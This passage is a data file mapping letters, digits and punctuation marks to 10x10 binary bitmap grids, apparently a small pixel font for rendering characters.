0, 0], [0, 1, 1, 0, 0, 0, 1, 1, 1, 0], [0, 1, 1, 0, 0, 0, 1, 1, 0, 0], [0, 1, 1, 1, 0, 1, 0, 1, 0, 0], [0, 1, 0, 1, 0, 1, 0, 1, 0, 0], [0, 1, 0, 1, 1, 0, 0, 1, 0, 0], [0, 1, 0, 1, 1, 0, 0, 1, 0, 0], [0, 1, 0, 0, 1, 0, 1, 1, 1, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "N": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 0, 0, 0], [0, 0, 1, 0, 1, 1, 0, 0, 0, 0], [0, 0, 1, 0, 0, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "O": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "P": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0, 1, 1, 0, 0], [0, 0, 0, 1, 1, 0, 1, 1, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "Q": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 0, 1, 0, 0, 0, 1, 1, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 1, 0, 0]], "R": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "S": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 
0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "T": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 1, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "U": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "V": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 1, 1, 0, 0, 0, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "W": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 1, 0, 0, 0, 0, 0, 1, 0], [0, 1, 1, 0, 0, 1, 0, 0, 1, 0], [0, 1, 1, 0, 0, 1, 0, 0, 1, 0], [0, 0, 1, 0, 1, 1, 1, 0, 0, 0], [0, 0, 1, 1, 1, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "X": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 1, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "Y": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 0, 0, 1, 0, 0, 0], 
[0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "Z": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "0": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "1": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "2": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "3": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "4": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 
0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "5": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "6": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "7": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "8": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "9": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "!": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 
0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "\"": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "#": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "$": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 1, 0, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0]], "%": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 0, 0, 0, 0], [0, 1, 0, 1, 0, 0, 1, 0, 0, 0], [0, 1, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 1, 0], [0, 0, 0, 0, 1, 0, 1, 0, 1, 0], [0, 0, 0, 1, 0, 0, 1, 0, 1, 0], [0, 0, 0, 0, 0, 0, 1, 1, 1, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "&": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 1, 0, 0], [0, 0, 1, 0, 1, 1, 1, 1, 0, 0], [0, 0, 1, 0, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "'": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 
0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "(": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0]], ")": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "*": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "+": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], ",": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "-": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 
0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], ".": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "/": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], ":": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], ";": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "<": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "=": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 
0, 0]], ">": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "?": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "@": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 1, 0, 0, 1, 1, 1, 0, 1, 0], [0, 1, 0, 1, 0, 1, 0, 0, 1, 0], [0, 0, 0, 1, 0, 1, 0, 0, 1, 0], [0, 0, 1, 1, 0, 1, 0, 1, 0, 0], [0, 1, 0, 1, 1, 1, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 0, 0, 0]], "[": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "\\": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "]": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "^": [[0, 0, 0, 0, 0, 0, 0, 
